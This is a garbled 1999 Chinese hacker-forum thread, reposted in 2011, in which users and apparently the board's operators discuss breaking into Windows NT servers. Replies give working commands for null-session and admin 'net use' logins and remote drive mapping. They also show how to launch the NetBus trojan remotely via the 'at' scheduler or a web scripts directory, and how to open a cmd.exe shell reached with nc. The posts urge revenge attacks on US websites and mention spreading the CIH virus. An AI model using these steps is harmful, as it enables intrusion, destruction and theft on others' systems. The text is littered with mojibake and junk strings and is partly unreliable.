《版主頁黑客工具和文章的幾個(gè)問題》中提到:
5 |0 P& U/ I9 x( y+ h1 C請教�����,從版主頁上載得PINGER��,GRINDER���,LETMEIN等���,卻不能用,PINGER安裝后�,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER���。EXE���,40多K��,運(yùn)行PINGER���,設(shè)置好IP,點(diǎn)PING����,彈出一個(gè)窗口(C++。����。。)�,說出錯(cuò),然后關(guān)閉了�,何故,是不是安裝有誤���? 2��。運(yùn)行LETMEIN����,彈出以下錯(cuò)誤:連接文件LETMEIN。EXE到不存在的NETAPI32����。DLL�����;NETGROUPGETUSERS�����。 是否說明需要NETAPI32�����。DLL文件�����,哪里有該DLL�。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4�����。0下運(yùn)行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4��。0 �,應(yīng)該不是吧? 4����。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT�����? 太多的問題需高手回答����,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用,實(shí)在窩囊哦����, 強(qiáng)烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章,以提高我國黑客水平���。
f' b, G w. I9 L; O+ M> 我的機(jī)子MMX166�,WIN98,2����。5G,32M內(nèi)存���。+ t# S/ Q( o8 [/ A/ N' |
& K. @1 V+ g5 w4 h; y8 e
黑客并不神秘,你只要了解操作系統(tǒng)��,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn)�����,輔助相關(guān)的工具�����,就可以成功��。
: L A! c7 w2 V你的問題是���,pinger, grinder, letmein等工具必須要在NT上運(yùn)行����,我們強(qiáng)烈建議,你一定要安裝NT�����,對于你的機(jī)器配制�����,和我們現(xiàn)在差不多�,只是比你多了32M內(nèi)存,2G硬盤�����。7 @* R8 r/ a4 L+ A9 r2 c
其實(shí)�����,攻擊敵站��,利用其操作系統(tǒng)本身的工具就可以了���,比如���,我們在NT上攻擊某服務(wù)器�����,該服務(wù)器為NT4.0��,我們將做如下簡單事情就有可能成功�,假設(shè)目標(biāo)NT的IP地址為111.111.111.111����,做法如下:
, \1 q/ u& ^2 I8 n7 ?4 K! rnet use \\111.111.111.111\ipc$ "" /user:""
/ N8 ?# O6 \1 s9 i/ z# Xnet.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session����,如果成功�,你可以查看該服務(wù)器上的共享目錄:/ d$ J, W3 l9 ^8 @4 }8 h( d
net view \\111.111.111.111
, B* G! H1 F7 F+ s當(dāng)然,如果你有該NT管理員密碼��,就更好辦了���,假設(shè)其管理員Admin密碼為fuck:
( m5 P) \8 y/ f) Znet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"& c6 }# e1 u5 C7 H- t" i: X
命令成功后�����,幾乎所有目標(biāo)NT上的配制���,資源���,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:
" L# ?* z, O; \. b8 {3 K# E* q! o1、查看或修改遠(yuǎn)程機(jī)器上的硬盤����,假如目標(biāo)NT上有C、D兩個(gè)硬盤:
1 v. a9 H: M8 I+ x0 ]% Vnet use x: \\111.111.111.111\c$5 U+ }0 `/ C- [3 L- B) J' ?0 q7 q
net use y: \\111.111.111.111\d$. ^9 h* m+ f5 d: h3 K! a1 a* i
這樣�����,目標(biāo)NT上的C�����、D盤分別被影射為你本地的X�����、Y盤�,你想怎么做都可以...
' h* l3 j$ T; K7 L- u6 a2、管理目標(biāo)NT的用戶:
$ c( A7 }0 ^9 U: T9 s4 F. Q- Q9 f從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”( h2 g' I/ [: O7 y* P0 n
鍵入\\111.111.111.111后�,目標(biāo)NT上的所有用戶你想怎么做都可以��,和管理你本地的一樣) B6 l% L. X2 E5 A; K$ Q4 L
3����、管理目標(biāo)NT的服務(wù)2 [: i9 Z# R/ C8 w6 D: N" o/ Y
選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
- u$ s: ]2 D6 o4 }這樣你可以管理目標(biāo)NT上的服務(wù)����,共享目錄
+ J. S. b& ^7 ~& C! ^ H8 X$ d' L1 [4、IIS管理) _- \ c# b7 T1 {2 i7 x/ [
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111" _# Q6 f" O: @/ P; b! ]
目標(biāo)NT的FTP���、WWW服務(wù)你就可以重新配置9 U8 D- a1 P+ L! o( p6 u) Q
5�、事件管理
/ q& ~& H6 X& L“事件查看器”->連接到服務(wù)器->111.111.111.111
- c$ B% {4 \6 U, N* u3 t; n! ~4 z2 N/ _
還有更多的東西��,都可以用NT本身的功能來完成�,這些都是95, 98所不能實(shí)現(xiàn)的。
4 h* z. o: w( R; _
5 s: A4 h1 B8 b% _1 ~當(dāng)然��,98,95也能做一些事情�����,但很麻煩�,比如:
S' A4 _, e( M; q* fnet use \\111.111.111.111\ipc$2 P- s5 g' v0 }* N8 ~+ k+ W
net use z: \\111.111.111.111\d$" k9 Y* w& T; x1 |* N$ C
但其后不能帶參數(shù)�,即改用其他用戶或密碼�,系統(tǒng)將用當(dāng)前用戶和密碼去登錄�,如果你知道目標(biāo)NT的用戶或密碼,重新啟動95, 98�,改用該用戶和密碼登錄,方可實(shí)現(xiàn)�,你可以連接目標(biāo)NT上的共享資源,但不能進(jìn)行管理����,如用戶、事件等% [7 _4 A+ i5 s
; k. P. k# T3 O( v5 s% r我們強(qiáng)烈建議各位有心要為死難者報(bào)仇���,真正的想黑霉國的站點(diǎn)���,花點(diǎn)時(shí)間,裝個(gè)NT吧�����,NT Workstation也可以�!& L' K, v5 r @$ f* @
這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用��!
2 B; v) ^) C" _* \
* I, u% t6 a/ X3 M. _* I# k2 ]
3 a. n9 D( Y/ U3 M9 w h& f--------------------------------------------------------------------------------. p! B" v6 y+ N7 X! F$ {" v- x. B
5 D* H# D) g" N3 l>quack于1999-06-12����,23:37:44
" x5 W: }2 b1 C4 Q4 F: k在大作《幾個(gè)有關(guān)黑的問題》中提到:
! r( t/ U! d |3 f$ G首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時(shí)無效,假定上傳其它"有益"美國NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個(gè)美國人,哈!����。# r% z. w% r9 s9 E; K+ g
4 @1 h3 ~5 g# |# O! i1 q
killusa于1999-06-13�����,03:25:152 g; B7 U" Q. z5 ^, y* |) V- ]
在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:3 h7 E$ R, b% \' u2 Y9 j- p# y
% X& b/ X# d- f! f5 V9 I. |letmein.exe 暫時(shí)沒有mypwd參數(shù)�,十分抱歉
4 s& ?- E Z7 x+ h& r" ^( G2 cpinger程序,只是利用ping來尋找主機(jī)�,每臺NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址����,比如有些服務(wù)器供應(yīng)商,一臺NT服務(wù)器上可以設(shè)置一千多個(gè)IP�,每個(gè)IP對應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址,就是該主機(jī)的主IP地址��,所以有時(shí)顯示只有IP��,而無主機(jī)名����。另外,有些服務(wù)器是非NT的操作系統(tǒng)��,有時(shí)將不會顯示主機(jī)名�。當(dāng)然,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置�,也會出現(xiàn)上面的情況。
% W. y4 b% {3 ]& U( b4 q- P
' S3 k. b; P/ ?. z8 ^Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序�����,所以��,netbus.exe是不用上傳的��,只需在目的
0 O9 ]6 M( f) O. [服務(wù)器上運(yùn)行ntsrv.exe��,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
% W. W+ D9 p* u$ j/ G3 M8 v# l
8 Z+ k- ^. ]! S8 w1�����、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序�����,具體使用方法��,可在自己的NT Dos窗口下鍵入以下:" A- W+ I" S* O# [# z% I- e0 P6 y
" D: _5 l1 ?8 C! f& ]$ {- SC:\>net start schedule, o$ z2 w6 h( Q1 f& L) o, E; b
Schedule 正在啟動服務(wù).....- i H' e* T: Q4 Z, D& ]7 o
Schedulw 服務(wù)啟動成功。
% {6 j6 @2 H7 J: _* wC:\>at /?7 `/ W3 ?) v) I. M# N0 Y
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序����。
$ I* N- R6 B5 H' W運(yùn)行 AT 命令之前必須先啟動 Schedule 服務(wù)。: n; w j' d6 c; g9 }, D
$ m2 {7 U% K: I4 @! e. oAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
$ t5 |+ C7 Y( ~+ ], k) K/ eAT [\\computername] time [/INTERACTIVE]
! P/ Q" T+ m: `5 i Q[ /EVERY:date[,...] | /NEXT:date[,...]] "command"- b5 }2 I1 y8 g0 B3 ~1 t! L9 e' V
0 b8 h+ k8 T+ a5 B# m0 A8 u9 E/ \\\computername 指定遠(yuǎn)程計(jì)算機(jī)���。 如果省略這個(gè)參數(shù)& d( @; L& o( G2 l- |+ t8 ~
命令會被排定在本機(jī)上運(yùn)行����。5 V1 s8 R3 n! ?7 v3 w
id 指定給排定進(jìn)度命令的識別號�����。& ?9 r. k# v0 Q( S
" W4 y" g& ]" `/ S2 B
/delete 刪除某個(gè)已排定進(jìn)度的命令���。如果省略標(biāo)識��,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會被刪除���。# H% J9 F5 q6 j3 i5 `* ?
/yes 用于刪除所有作業(yè),且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 ����。% c" m7 u, [% W; E9 R
time 指定命令運(yùn)行的時(shí)間。
8 w2 \. f9 T0 M7 I/ p7 Z: k& h/interactive 允許作業(yè)在運(yùn)行時(shí)��,與用戶通過桌面交互��。5 a1 u; J8 h3 v
# d3 j! q! f2 I; k% j0 v
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令����。
/ I$ h0 F# Q7 F* ]3 g如果省略日期,則默認(rèn)為在每月的本日運(yùn)行��。
2 e5 C! L! o# m9 I7 T$ c c3 C
5 c0 g9 J" N6 t) g) `! N; F9 M6 o/next:date[,...] 指定在下一個(gè)指定日期 (如���,下周三)���,運(yùn)行命令。如果省略日期���,則默認(rèn)為在每月的本日運(yùn)行��。
( I1 S9 h( |% A5 a; H" I. P; P
' ~) `. v5 I9 |* m- N p"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件���。$ j5 u4 {: {1 X: C9 U! J
7 C7 C5 v% R, p* w c7 t
C:\>% r- { Q9 f1 e# D& v0 k! ]( w0 l6 X4 ?
8 B9 C. v j6 |6 O6 x知道了如何使用AT,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
: S: ` `% H1 L# P1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"4 f0 t, N" S; L9 [+ R/ i
2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
4 j+ w. u( h4 y- z6 x$ ~# ?3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行�����,當(dāng)然最快運(yùn)行最理想���,所以��,你可以用letmein.exe得到服務(wù)器的時(shí)間��,然后:
2 F6 _: g3 g: v7 X$ rat \\x.x.x.x 00:00 ntsrv.exe /port:64321+ a, m3 G* O. m
其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量���,等一會后,再在本地啟動netbus.exe���,鍵入目的服務(wù)器得ip地址或hostname����,連接��!具體使用可參照 "How to get in nt"���,比如第一種方法����,你想要在目的服務(wù)器運(yùn)行 LEGION,可以利用netbus得上傳功能����,將LEGION上傳至目的服務(wù)器����,再用netbus的"Start program",鍵入完整路徑的LEGION運(yùn)行程序���,就ok了�����!第二種方法是利用netbus的“App redirect”功能�����,啟動遠(yuǎn)程telnet服務(wù)���,如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe"����,Port為:4321�,服務(wù)就啟動了�����,然后在本地運(yùn)行:nc x.x.x.x 4321���,出現(xiàn)dos啟動的畫面就表示連接成功:6 R3 C+ K# x" x9 |
Microsoft(R) Windows NT(TM)) R( R% \, f$ p8 l
(C) Copyright 1985-1996 Microsoft Corp.
! J: h0 j: _* ~, W" IC:\>; a+ Z8 t; a f8 B
& M/ J" B/ m1 Z% A
2��、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器
6 ]# X j6 F. D3 R8 Z1 P- S! h9 M1 E4 d) b- u5 n2 V4 E4 `9 N+ D
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄����,如cgi-bin或scripts��,然后在瀏覽器鍵入url如:8 f9 _0 e- W! i! U
http://x.x.x.x/scripts/ntsrv.exe /port:64321+ ]4 a3 ]" |8 G' l" z5 M( m# [
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
7 D- X( |8 {* b+ Q- M該程序就啟動了
. v' a1 l" J- ^1 Z1 q+ k- ~) o+ B: c9 U' D ~7 R) A" s
我只提這幾中方法�!
5 P0 H2 {6 _! o& T! k要成功,必須打好基礎(chǔ)工��,對操作系統(tǒng)充分了解!
/ Y$ g0 V2 Z! y- T8 p& g! T7 A* B. B( I
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡